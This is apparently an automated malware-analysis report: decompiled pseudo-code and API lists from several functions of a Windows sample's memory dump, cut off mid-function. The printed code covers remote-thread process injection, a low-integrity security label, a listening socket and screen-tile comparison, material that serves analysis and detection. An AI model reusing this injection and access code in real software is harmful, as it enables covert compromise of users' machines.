    • Opcode Fuzzy Hash: 0d91bdbe08c78bcf7485725fab8d1d66fe13e3f12aca4c8c04d7478e417d3d91
    • Instruction Fuzzy Hash: C511027224020856D6202B29EC497FB3748ABA1B10F54083FFE21E21A1DA3EA9C6925D
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00428190(long __eax, intOrPtr _a4) {
    				void* __esi;
    				void* _t5;
    				void* _t19;
    				void* _t22;
    				void* _t24;
    
    				_t22 = OpenProcess(0x47a, 0, __eax);
    				if(_t22 == 0) {
    					L6:
    					return 0;
    				} else {
    					_t5 = E0041CE60(_t22, _a4, 0);
    					_t19 = _t5;
    					if(_t19 == 0) {
    						L5:
    						CloseHandle(_t22);
    						goto L6;
    					} else {
    						_t24 = CreateRemoteThread(_t22, 0, 0, _t5 -  *0x42e90c + E0041D930, 0, 0, 0);
    						if(_t24 == 0) {
    							VirtualFreeEx(_t22, _t19, 0, 0x8000);
    							goto L5;
    						} else {
    							WaitForSingleObject(_t24, 0x2710);
    							CloseHandle(_t24);
    							CloseHandle(_t22);
    							return 1;
    						}
    					}
    				}
    			}









    APIs
    • OpenProcess.KERNEL32(0000047A,00000000,0000022C,?,00000000,004284A5,?,?,?,?,?,?,?,?,?,00000000), ref: 0042819C
      • Part of subcall function 0041CE60: DuplicateHandle.KERNEL32(000000FF,?,00000000,?,00000000,00000000,00000002,00000000,00000000,00000000,00000000,?,00000010), ref: 0041CE9B
      • Part of subcall function 0041CE60: WriteProcessMemory.KERNEL32(00000000,?,?,00000004,00000000,?,00000010), ref: 0041CED3
      • Part of subcall function 0041CE60: WriteProcessMemory.KERNEL32(00000000,?,?,00000004,00000000,?,00000010), ref: 0041CEF7
      • Part of subcall function 0041CE60: DuplicateHandle.KERNEL32(000000FF,?,00000000,?,00000000,00000000,00000002,?,00000010), ref: 0041CF25
      • Part of subcall function 0041CE60: WriteProcessMemory.KERNEL32(00000000,000004B0,?,00000004,00000000,?,00000010), ref: 0041CF38
      • Part of subcall function 0041CE60: DuplicateHandle.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000001,?,00000010), ref: 0041CF4E
    • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,-0084C23C,00000000,00000000,00000000), ref: 004281D3
    • WaitForSingleObject.KERNEL32(00000000,00002710,?,?,?,?,?,?,?,?,00000000,?), ref: 004281E5
    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000,?), ref: 004281EC
    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,00000000,?), ref: 004281F6
    • VirtualFreeEx.KERNEL32(00000000,00000000,00000000,00008000,?,?,?,?,?,?,?,?,00000000,?), ref: 0042820D
    • CloseHandle.KERNEL32(00000000,?,00000000,00000000,?,?,?,?,?,?,?,?,00000000,?), ref: 00428215
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: Handle$Process$CloseDuplicateMemoryWrite$CreateFreeObjectOpenRemoteSingleThreadVirtualWait
    • String ID:
    • API String ID: 3021577363-0
    • Opcode ID: 037dc62950ed38f5e49afb52f522b1bc3f6799230f214d50ca7eccebbc4f4a3a
    • Instruction ID: 19da691ac512ac1678b9f0c2a1aec5a7c81d3177f275ac7bfee0fa22b8d0c3f6
    • Opcode Fuzzy Hash: 037dc62950ed38f5e49afb52f522b1bc3f6799230f214d50ca7eccebbc4f4a3a
    • Instruction Fuzzy Hash: 2701D8762C26257BD2601765AD09FDB3B1CDB46B11F144026FB04FA1E18BB55400867C
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 86%
    			E0040C330() {
    				char _v672;
    				char _v800;
    				long _t6;
    				void* _t7;
    				void* _t8;
    				void* _t19;
    				void* _t20;
    
    				if( *0x42d490 == 0) {
    					E0041D150( &_v800);
    					E00416E10(0x42eb70,  &_v672,  *0x42e904, 0x42d490, 2);
    				}
    				_t19 = 0;
    				_t20 = CreateMutexW(0x42e930, 0, 0x42d490);
    				if(_t20 == 0) {
    					L10:
    					return _t19;
    				}
    				_t6 = WaitForSingleObject(_t20, 0xffffffff);
    				if(_t6 != 0 && _t6 != 0x80) {
    					L9:
    					CloseHandle(_t20);
    					goto L10;
    				}
    				 *0x42d420 = _t20;
    				_t7 = E0040C250();
    				if(_t7 != 0) {
    					return _t7;
    				} else {
    					_t8 = HeapAlloc( *0x42e6d4, 8, 0x34);
    					_t19 = _t8;
    					if(_t19 == 0) {
    						ReleaseMutex(_t20);
    						goto L9;
    					}
    					 *((intOrPtr*)(_t19 + 0x14)) = 0x30;
    					return _t8;
    				}
    			}











    APIs
    • CreateMutexW.KERNEL32(0042E930,00000000,0042D490,74B05520,00000000), ref: 0040C37B
    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0040C38A
    • HeapAlloc.KERNEL32(?,00000008,00000034), ref: 0040C3B5
      • Part of subcall function 00416E10: StringFromGUID2.OLE32(0042EB70,?,00000028,0042EB70,0042EB70,00000010,00000000,00000000), ref: 00416EE6
    • ReleaseMutex.KERNEL32(00000000), ref: 0040C3D2
    • CloseHandle.KERNEL32(00000000), ref: 0040C3D9
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: Mutex$AllocCloseCreateFromHandleHeapObjectReleaseSingleStringWait
    • String ID: pB
    • API String ID: 2916992386-3059159000
    • Opcode ID: fb77f018d931ddad48b7e89164d6c81ef707f2f0f30168538d14b3d06ff388a5
    • Instruction ID: b8c892cb5e05e7d7aa04fdeb8d67cdb158711a6a6227cf05751652df113614ff
    • Opcode Fuzzy Hash: fb77f018d931ddad48b7e89164d6c81ef707f2f0f30168538d14b3d06ff388a5
    • Instruction Fuzzy Hash: DF11E535700210A7C331A75AFD49B9F3765AB80714F90823BF904E62E0DB7CA945839D
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00427E81(void* __eax) {
    				intOrPtr _t15;
    				struct HWND__* _t29;
    
    				if(__eax + 0x42e94e == 0 || WaitForSingleObject( *0x42edbc, 0) == 0) {
    					return ReleaseCapture();
    				} else {
    					if( *((intOrPtr*)( *0x42eeb0 + 0x10c)) != GetCurrentThreadId()) {
    						SetLastError(5);
    						return 0;
    					} else {
    						WaitForSingleObject( *0x42eeb4, 0xffffffff);
    						_t15 =  *0x42eeb0;
    						_t29 =  *(_t15 + 0x108);
    						 *(_t15 + 0x10c) = 0;
    						 *( *0x42eeb0 + 0x108) = 0;
    						 *((short*)( *0x42eeb0 + 0x110)) = 0;
    						ReleaseMutex( *0x42eeb4);
    						if(IsWindow(_t29) != 0) {
    							SendMessageW(_t29, 0x215, 0, 0);
    						}
    						return 1;
    					}
    				}
    			}






    APIs
    • WaitForSingleObject.KERNEL32(?,00000000), ref: 00427E9C
    • GetCurrentThreadId.KERNEL32 ref: 00427EA6
    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00427EC3
    • ReleaseMutex.KERNEL32(?), ref: 00427EFE
    • IsWindow.USER32(?), ref: 00427F05
    • SendMessageW.USER32(?,00000215,00000000,00000000), ref: 00427F19
    • SetLastError.KERNEL32(00000005), ref: 00427F28
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: ObjectSingleWait$CurrentErrorLastMessageMutexReleaseSendThreadWindow
    • String ID:
    • API String ID: 2394950798-0
    • Opcode ID: 0184ed2494fbe5e87a582de832e017ea7e2451937e1af9662c65da09e688fd82
    • Instruction ID: 85e858472a7bc5845b9a7890ceeed18e17f895e1a7946e147247625f2f21061e
    • Opcode Fuzzy Hash: 0184ed2494fbe5e87a582de832e017ea7e2451937e1af9662c65da09e688fd82
    • Instruction Fuzzy Hash: 53113931308220DBD7109B65FE48B9633A4BB08311F9645BAF504AB2F0D7B8A8428B88
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 50%
    			E004155D0() {
    				intOrPtr _v12;
    				char _v16;
    				int _v20;
    				int _v24;
    				struct _SECURITY_DESCRIPTOR* _v28;
    				struct _ACL* _v32;
    				char* _t11;
    				intOrPtr _t16;
    				struct _ACL* _t17;
    
    				_t17 = 0;
    				E004129B0(L"SeSecurityPrivilege");
    				_t11 =  &_v16;
    				__imp__ConvertStringSecurityDescriptorToSecurityDescriptorW(L"S:(ML;CIOI;NRNWNX;;;LW)", 1, _t11, 0);
    				if(_t11 != 0) {
    					_v32 = 0;
    					if(GetSecurityDescriptorSacl(_v28,  &_v20,  &_v32,  &_v24) != 0) {
    						_t16 = _v12;
    						__imp__SetNamedSecurityInfoW(_t16, 1, 0x10, 0, 0, 0, _v32);
    						if(_t16 == 0) {
    							_t17 = 1;
    						}
    					}
    					LocalFree(_v28);
    				}
    				return _t17;
    			}













    APIs
      • Part of subcall function 004129B0: GetCurrentThread.KERNEL32 ref: 004129BD
      • Part of subcall function 004129B0: OpenThreadToken.ADVAPI32(00000000), ref: 004129C4
      • Part of subcall function 004129B0: OpenProcessToken.ADVAPI32(000000FF,00000020,?), ref: 004129D7
    • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;CIOI;NRNWNX;;;LW),00000001,?,00000000), ref: 004155ED
    • GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?,?,?,?,?,00000000), ref: 0041560F
    • SetNamedSecurityInfoW.ADVAPI32(?,00000001,00000010,00000000,00000000,00000000,?,?,?,?,?,00000000), ref: 0041562A
    • LocalFree.KERNEL32(?,?,?,?,?,00000000), ref: 0041563B
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: Security$Descriptor$OpenThreadToken$ConvertCurrentFreeInfoLocalNamedProcessSaclString
    • String ID: S:(ML;CIOI;NRNWNX;;;LW)$SeSecurityPrivilege
    • API String ID: 3555451682-1937014404
    • Opcode ID: 5c4db446908ee34f3954bcaef7d74de7348f88bdd9b288bd9ab2835081f65749
    • Instruction ID: 6db4545cd2e073eb2715da7699a2d1421ba959c06f0a76aa084d70fb424212d3
    • Opcode Fuzzy Hash: 5c4db446908ee34f3954bcaef7d74de7348f88bdd9b288bd9ab2835081f65749
    • Instruction Fuzzy Hash: 25018FF1244301AFD310DF50CDC0EE777ACEB84744F00882EF98592191E678D8498779
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 46%
    			E00406CC0(void* __eax, intOrPtr* __esi) {
    				intOrPtr _t5;
    				void* _t7;
    				intOrPtr _t8;
    				short _t12;
    				intOrPtr _t13;
    				intOrPtr* _t14;
    
    				_t14 = __esi;
    				if(__eax != 0) {
    					_t5 = E00415030(__eax, _t12);
    				} else {
    					_t5 = E00414F40(_t12);
    				}
    				 *_t14 = _t5;
    				if(_t5 == 0xffffffff) {
    					L10:
    					 *_t14 = 0xffffffff;
    					 *(_t14 + 4) = 0;
    					return 0;
    				} else {
    					_t7 = CreateEventW(0, 0, 0, 0);
    					 *(_t14 + 4) = _t7;
    					if(_t7 == 0) {
    						L8:
    						_t13 =  *_t14;
    						if(_t13 != 0xffffffff) {
    							__imp__#22(_t13, 2);
    							__imp__#3(_t13);
    						}
    						goto L10;
    					} else {
    						_t8 =  *_t14;
    						__imp__WSAEventSelect(_t8, _t7, 8);
    						if(_t8 != 0) {
    							CloseHandle( *(_t14 + 4));
    							goto L8;
    						} else {
    							return 1;
    						}
    					}
    				}
    			}










    APIs
    • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00406EDE), ref: 00406CE1
    • WSAEventSelect.WS2_32(00000000,00000000,00000008), ref: 00406CF4
      • Part of subcall function 00414F40: GetTickCount.KERNEL32 ref: 00414F80
      • Part of subcall function 00414F40: socket.WS2_32(?,00000001,00000006), ref: 00414FBF
      • Part of subcall function 00414F40: bind.WS2_32(00000000,00000002,-0000001D), ref: 00414FE1
      • Part of subcall function 00414F40: listen.WS2_32(00000000,7FFFFFFF), ref: 00414FED
      • Part of subcall function 00414F40: closesocket.WS2_32(00000000), ref: 00414FF8
    • CloseHandle.KERNEL32(?), ref: 00406D06
    • shutdown.WS2_32(00000000,00000002), ref: 00406D16
    • closesocket.WS2_32(00000000), ref: 00406D1D
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: Eventclosesocket$CloseCountCreateHandleSelectTickbindlistenshutdownsocket
    • String ID: p0u
    • API String ID: 3099518682-1742372003
    • Opcode ID: 0c00c60eebf260ec0e59da2aae27809ee80ad0c6a00fe6871682c1fd11f28fbb
    • Instruction ID: 65f8ca898ce9404f761a7ac0dd1ec09e42ce21a56408490c94b3bbace500e2e4
    • Opcode Fuzzy Hash: 0c00c60eebf260ec0e59da2aae27809ee80ad0c6a00fe6871682c1fd11f28fbb
    • Instruction Fuzzy Hash: 9701A9712007016BE7606F78FD09B5A37A4AF85760F11472EF5A3F72E0DB3894528718
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0040EAB0(void* __ecx, void* __edx, void* __eflags) {
    				long _t4;
    				long _t10;
    				long _t12;
    				void* _t17;
    
    				_t16 = __edx;
    				_t17 = E0041CDD0(__eflags, 0x19367401, 1);
    				if(_t17 != 0) {
    					_t4 = WaitForSingleObject( *0x42edbc, 0);
    					__eflags = _t4;
    					if(_t4 != 0) {
    						SetThreadPriority(GetCurrentThread(), 0xfffffff1);
    						_t10 = WaitForSingleObject( *0x42edbc, 0x1388);
    						__eflags = _t10 - 0x102;
    						if(_t10 == 0x102) {
    							do {
    								E00428230(_t16);
    								_t16 =  *0x42edbc;
    								_t12 = WaitForSingleObject( *0x42edbc, 0x1388);
    								__eflags = _t12 - 0x102;
    							} while (_t12 == 0x102);
    						}
    					}
    					ReleaseMutex(_t17);
    					CloseHandle(_t17);
    					__eflags = 0;
    					return 0;
    				} else {
    					_t1 = _t17 + 1; // 0x1
    					return _t1;
    				}
    			}








    APIs
      • Part of subcall function 0041CDD0: CreateMutexW.KERNEL32(0042E930,00000000,?,?,?,?,?), ref: 0041CE18
      • Part of subcall function 0041CDD0: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0041CE27
      • Part of subcall function 0041CDD0: CloseHandle.KERNEL32(00000000), ref: 0041CE39
    • WaitForSingleObject.KERNEL32(?,00000000,?,19367401,00000001), ref: 0040EAD9
    • GetCurrentThread.KERNEL32 ref: 0040EAE1
    • SetThreadPriority.KERNEL32(00000000,?,19367401,00000001), ref: 0040EAE8
    • WaitForSingleObject.KERNEL32(?,00001388,?,19367401,00000001), ref: 0040EAFA
    • WaitForSingleObject.KERNEL32(?,00001388,?,19367401,00000001), ref: 0040EB14
    • ReleaseMutex.KERNEL32(00000000,?,19367401,00000001), ref: 0040EB1E
    • CloseHandle.KERNEL32(00000000,?,19367401,00000001), ref: 0040EB25
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: ObjectSingleWait$CloseHandleMutexThread$CreateCurrentPriorityRelease
    • String ID:
    • API String ID: 926561493-0
    • Opcode ID: 10f98dfb754679a2a43b14191f00f06da696a35ab807f35b08b76e741f72a0a7
    • Instruction ID: a0624e6b78377e5214d65748fef15d2b95d28fd278ca227f7f31204237c34ab6
    • Opcode Fuzzy Hash: 10f98dfb754679a2a43b14191f00f06da696a35ab807f35b08b76e741f72a0a7
    • Instruction Fuzzy Hash: 24F0C832750215A7C751E765BC49EEF377AABD8710B900A7FF101F21E4DA78E4428B68
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00425BD0(void* __eax) {
    				void* _t10;
    				void* _t11;
    				void* _t12;
    				void* _t13;
    				void* _t14;
    				void* _t15;
    				void* _t16;
    				void* _t34;
    				void* _t35;
    
    				_t34 = __eax;
    				_t10 =  *(__eax + 8);
    				if(_t10 != 0) {
    					HeapFree( *0x42e6d4, 0, _t10);
    				}
    				_t11 =  *(_t34 + 0x10);
    				if(_t11 != 0) {
    					HeapFree( *0x42e6d4, 0, _t11);
    				}
    				_t12 =  *(_t34 + 0x1c);
    				if(_t12 != 0) {
    					HeapFree( *0x42e6d4, 0, _t12);
    				}
    				_t13 =  *(_t34 + 0x2c);
    				if(_t13 != 0) {
    					HeapFree( *0x42e6d4, 0, _t13);
    				}
    				_t14 =  *(_t34 + 0x30);
    				if(_t14 != 0) {
    					HeapFree( *0x42e6d4, 0, _t14);
    				}
    				_t15 =  *(_t34 + 0x34);
    				if(_t15 != 0) {
    					HeapFree( *0x42e6d4, 0, _t15);
    				}
    				_t16 =  *(_t34 + 0x40);
    				if(_t16 != 0) {
    					_t16 = HeapFree( *0x42e6d4, 0, _t16);
    				}
    				_t35 =  *(_t34 + 0x44);
    				if(_t35 != 0) {
    					_t16 = HeapFree( *0x42e6d4, 0, _t35);
    				}
    				return _t16;
    			}













    APIs
    • HeapFree.KERNEL32(?,00000000,?,?,00000000,00408C23), ref: 00425BEA
    • HeapFree.KERNEL32(?,00000000,?,?,00000000,00408C23), ref: 00425BFD
    • HeapFree.KERNEL32(?,00000000,?,?,00000000,00408C23), ref: 00425C10
    • HeapFree.KERNEL32(?,00000000,?,?,00000000,00408C23), ref: 00425C22
    • HeapFree.KERNEL32(?,00000000,?,?,00000000,00408C23), ref: 00425C35
    • HeapFree.KERNEL32(?,00000000,?,?,00000000,00408C23), ref: 00425C48
    • HeapFree.KERNEL32(?,00000000,?,?,00000000,00408C23), ref: 00425C5A
    • HeapFree.KERNEL32(?,00000000,?,?,00000000,00408C23), ref: 00425C6D
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: FreeHeap
    • String ID:
    • API String ID: 3298025750-0
    • Opcode ID: 2c0d321d4c3c6ea58b7c2026c5f876af870996dd57d2dd1991837b9a465888dc
    • Instruction ID: e6b17622f593dc4016e9fe31ba1faa8f0e5c7b423b329e4bb56324b48d4ca245
    • Opcode Fuzzy Hash: 2c0d321d4c3c6ea58b7c2026c5f876af870996dd57d2dd1991837b9a465888dc
    • Instruction Fuzzy Hash: 5211A7713007146BD634EB6BED40F27B3ECABA4B40FD54529B601D7690D674FC018B68
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 55%
    			E00405C70(void* __eax) {
    				void* __ebx;
    				void* __esi;
    				signed short _t120;
    				signed short _t123;
    				signed short _t124;
    				signed int _t125;
    				void* _t128;
    				signed short _t134;
    				signed int _t135;
    				signed int _t140;
    				void* _t142;
    				void* _t145;
    				void* _t146;
    				long _t148;
    				void* _t152;
    				signed char _t154;
    				intOrPtr* _t156;
    				intOrPtr* _t158;
    				intOrPtr* _t160;
    				signed short _t164;
    				signed short _t166;
    				signed int _t167;
    				signed int _t172;
    				signed int _t174;
    				signed short _t179;
    				signed short _t180;
    				signed int _t181;
    				void* _t183;
    				void* _t185;
    				void* _t187;
    				void* _t191;
    				signed int _t200;
    				signed int _t201;
    				signed int _t202;
    				signed int _t203;
    				signed int _t204;
    				signed int _t207;
    				void* _t217;
    				void* _t219;
    				void* _t223;
    				intOrPtr _t224;
    				intOrPtr _t225;
    				signed int _t226;
    				signed int _t230;
    				void* _t231;
    				intOrPtr* _t232;
    				void* _t233;
    				signed int _t238;
    				signed short _t239;
    				void* _t242;
    				void* _t245;
    				void* _t246;
    				void* _t247;
    
    				_t224 =  *((intOrPtr*)(_t247 + 0x40));
    				_t172 =  *(_t224 + 5) & 0x0000ffff;
    				_t231 = __eax;
    				if(_t172 == 0) {
    					L76:
    					return 0;
    				} else {
    					_t203 =  *(_t224 + 7) & 0x0000ffff;
    					if(_t203 == 0) {
    						goto L76;
    					} else {
    						 *(_t247 + 0x1c) = 0;
    						 *(_t247 + 0x28) = 0;
    						 *(_t247 + 0x30) = 0;
    						_t120 =  *(_t224 + 1) & 0x0000ffff;
    						_t204 =  *(_t224 + 3) + _t203 & 0x0000ffff;
    						_t174 = _t172 + _t120 & 0x0000ffff;
    						 *(_t247 + 0x38) = _t174;
    						 *(_t247 + 0x34) = _t204;
    						_t164 = _t120;
    						while(1) {
    							_t123 = _t174 - _t164 & 0x0000ffff;
    							 *(_t247 + 0x24) = _t164;
    							if(0x60 >= _t123) {
    								_t124 = _t123 & 0x0000ffff;
    								 *(_t247 + 0x1c) = _t124;
    							} else {
    								_t124 = 0x60;
    								 *(_t247 + 0x1c) = 0x60;
    							}
    							if(_t164 >= _t174 || _t124 == 0) {
    								break;
    							}
    							 *(_t247 + 0x28) = ( *(_t231 + 0x30) & 0x000000ff) * (_t124 & 0x0000ffff);
    							_t134 =  *(_t224 + 3) & 0x0000ffff;
    							 *(_t247 + 0x18) = _t134;
    							while(1) {
    								_t179 = _t204 - _t134 & 0x0000ffff;
    								if(0x60 >= _t179) {
    									_t180 = _t179 & 0x0000ffff;
    									 *(_t247 + 0x14) = _t180;
    								} else {
    									_t180 = 0x60;
    									 *(_t247 + 0x14) = 0x60;
    								}
    								if(_t134 >= _t204 || _t180 == 0) {
    									break;
    								}
    								_t207 = _t134 & 0x0000ffff;
    								_t135 =  *(_t231 + 8) & 0x0000ffff;
    								_t226 = _t180 & 0x0000ffff;
    								_t181 =  *(_t231 + 0x30) & 0x000000ff;
    								_t23 = _t226 - 1; // -1
    								_t238 = _t164 & 0x0000ffff;
    								_t230 = ((_t207 + _t23) * _t135 + _t238) * _t181;
    								_t167 = (_t135 * _t207 + _t238) * _t181;
    								 *(_t247 + 0x30) = _t167;
    								if( *((char*)( *((intOrPtr*)(_t247 + 0x48)))) == 0) {
    									L42:
    									_t140 = ( *(_t231 + 0x41) & 0x000000ff) * 0x2400;
    									if( *((intOrPtr*)(_t231 + 0x4c)) == 5) {
    										_t50 = _t140 + 0x31; // 0x31
    										 *(_t247 + 0x10) =  *(_t247 + 0x10) + _t50;
    									} else {
    										 *(_t247 + 0x10) =  *(_t247 + 0x10) + _t140;
    										 *0x42d3a8 = _t140;
    									}
    									_t239 =  *(_t247 + 0x2c);
    									_t142 =  *(_t247 + 0x10) + _t239 + 0xc;
    									if(_t142 != 0) {
    										_t183 =  *(_t247 + 0x20);
    										_push(_t142 + 4);
    										if(_t183 != 0) {
    											_t145 = HeapReAlloc( *0x42e6d4, 8, _t183, ??);
    										} else {
    											_t145 = HeapAlloc( *0x42e6d4, 8, ??);
    										}
    										if(_t145 != 0) {
    											 *(_t247 + 0x20) = _t145;
    											_t185 = _t145;
    											goto L54;
    										}
    									} else {
    										_t152 =  *(_t247 + 0x20);
    										if(_t152 != 0) {
    											HeapFree( *0x42e6d4, 0, _t152);
    										}
    										_t185 = 0;
    										 *(_t247 + 0x20) = 0;
    										L54:
    										asm("rol dx, 0x8");
    										 *((short*)(_t185 + _t239)) =  *(_t247 + 0x24) & 0x0000ffff;
    										asm("rol dx, 0x8");
    										 *((short*)(_t185 + _t239 + 2)) =  *(_t247 + 0x18) & 0x0000ffff;
    										asm("rol dx, 0x8");
    										 *((short*)(_t185 + _t239 + 4)) =  *(_t247 + 0x1c) & 0x0000ffff;
    										asm("rol dx, 0x8");
    										 *((short*)(_t185 + _t239 + 6)) =  *(_t247 + 0x14) & 0x0000ffff;
    										 *((intOrPtr*)(_t185 + _t239 + 8)) =  *((intOrPtr*)(_t231 + 0x50));
    										_t76 = _t239 + 0xc; // 0xc
    										_t146 = _t185 + _t76;
    										if( *((intOrPtr*)(_t231 + 0x4c)) == 5) {
    											_t187 = ( *(_t231 + 0x41) & 0x000000ff) - 1;
    											if(_t187 == 0) {
    												_t148 = E00404F80( *(_t247 + 0x28) & 0x0000ffff, _t231, _t146,  *(_t247 + 0x2c) & 0x0000ffff,  *(_t247 + 0x20) & 0x0000ffff,  *(_t247 + 0x14) & 0x0000ffff);
    												goto L63;
    											} else {
    												_t191 = _t187 - 1;
    												if(_t191 == 0) {
    													_t148 = E00405450( *(_t247 + 0x28) & 0x0000ffff, _t231, _t146,  *(_t247 + 0x2c) & 0x0000ffff,  *(_t247 + 0x20) & 0x0000ffff,  *(_t247 + 0x14) & 0x0000ffff);
    													goto L63;
    												} else {
    													if(_t191 == 2) {
    														_push( *(_t247 + 0x14) & 0x0000ffff);
    														_push( *(_t247 + 0x20) & 0x0000ffff);
    														_push( *(_t247 + 0x2c) & 0x0000ffff);
    														_push(_t146);
    														_push(_t231);
    														_t148 = E00405940( *(_t247 + 0x28) & 0x0000ffff);
    														goto L63;
    													} else {
    														 *(_t247 + 0x10) = 0;
    													}
    												}
    											}
    										} else {
    											_t148 = E00405B80( *(_t247 + 0x30), _t231, _t146, _t167, _t230);
    											_t239 =  *(_t247 + 0x2c);
    											L63:
    											 *(_t247 + 0x10) = _t148;
    											if(_t148 != 0) {
    												 *(_t247 + 0x34) =  *(_t247 + 0x34) + 1;
    												 *(_t247 + 0x2c) = _t148 + _t239 + 0xc;
    											}
    										}
    									}
    								} else {
    									_t154 =  *(_t231 + 0x30);
    									if(_t154 != 1) {
    										if(_t154 != 2) {
    											if(_t154 == 4) {
    												_t200 = _t167;
    												if(_t167 <= _t230) {
    													do {
    														_t156 =  *((intOrPtr*)(_t231 + 0x18)) + _t200;
    														_t217 =  *(_t247 + 0x28) + _t156;
    														if(_t156 >= _t217) {
    															goto L39;
    														} else {
    															_t242 =  *((intOrPtr*)(_t231 + 0x14)) - _t156 + _t200;
    															while( *((intOrPtr*)(_t156 + _t242)) ==  *_t156) {
    																_t156 = _t156 + 4;
    																if(_t156 < _t217) {
    																	continue;
    																} else {
    																	goto L39;
    																}
    																goto L65;
    															}
    															goto L41;
    														}
    														goto L65;
    														L39:
    														_t200 = _t200 +  *((intOrPtr*)(_t231 + 0xc));
    													} while (_t200 <= _t230);
    												}
    											}
    										} else {
    											_t201 = _t167;
    											if(_t167 <= _t230) {
    												do {
    													_t158 =  *((intOrPtr*)(_t231 + 0x18)) + _t201;
    													_t219 =  *(_t247 + 0x28) + _t158;
    													if(_t158 >= _t219) {
    														goto L31;
    													} else {
    														_t245 =  *((intOrPtr*)(_t231 + 0x14)) - _t158 + _t201;
    														while( *((intOrPtr*)(_t158 + _t245)) ==  *_t158) {
    															_t158 = _t158 + 2;
    															if(_t158 < _t219) {
    																continue;
    															} else {
    																goto L31;
    															}
    															goto L65;
    														}
    														goto L41;
    													}
    													goto L65;
    													L31:
    													_t201 = _t201 +  *((intOrPtr*)(_t231 + 0xc));
    												} while (_t201 <= _t230);
    											}
    										}
    									} else {
    										_t202 = _t167;
    										if(_t167 <= _t230) {
    											do {
    												_t160 =  *((intOrPtr*)(_t231 + 0x18)) + _t202;
    												_t246 = _t160 +  *(_t247 + 0x28);
    												if(_t160 >= _t246) {
    													goto L22;
    												} else {
    													_t223 =  *((intOrPtr*)(_t231 + 0x14)) - _t160 + _t202;
    													while( *((intOrPtr*)(_t223 + _t160)) ==  *_t160) {
    														_t160 = _t160 + 1;
    														if(_t160 < _t246) {
    															continue;
    														} else {
    															goto L22;
    														}
    														goto L65;
    													}
    													L41:
    													_t167 =  *(_t247 + 0x30);
    													goto L42;
    												}
    												goto L65;
    												L22:
    												_t202 = _t202 +  *((intOrPtr*)(_t231 + 0xc));
    											} while (_t202 <= _t230);
    										}
    									}
    								}
    								L65:
    								 *(_t247 + 0x18) =  *(_t247 + 0x18) +  *(_t247 + 0x14);
    								_t224 =  *((intOrPtr*)(_t247 + 0x48));
    								_t164 =  *(_t247 + 0x24);
    								_t204 =  *(_t247 + 0x38);
    								_t134 =  *(_t247 + 0x18);
    							}
    							_t164 =  *(_t247 + 0x1c) + _t164;
    							_t174 =  *(_t247 + 0x3c);
    						}
    						_t125 =  *(_t247 + 0x34);
    						if(_t125 != 0) {
    							_t225 =  *((intOrPtr*)(_t247 + 0x40));
    							_t232 = __imp__#19;
    							asm("rol ax, 0x8");
    							_push(0);
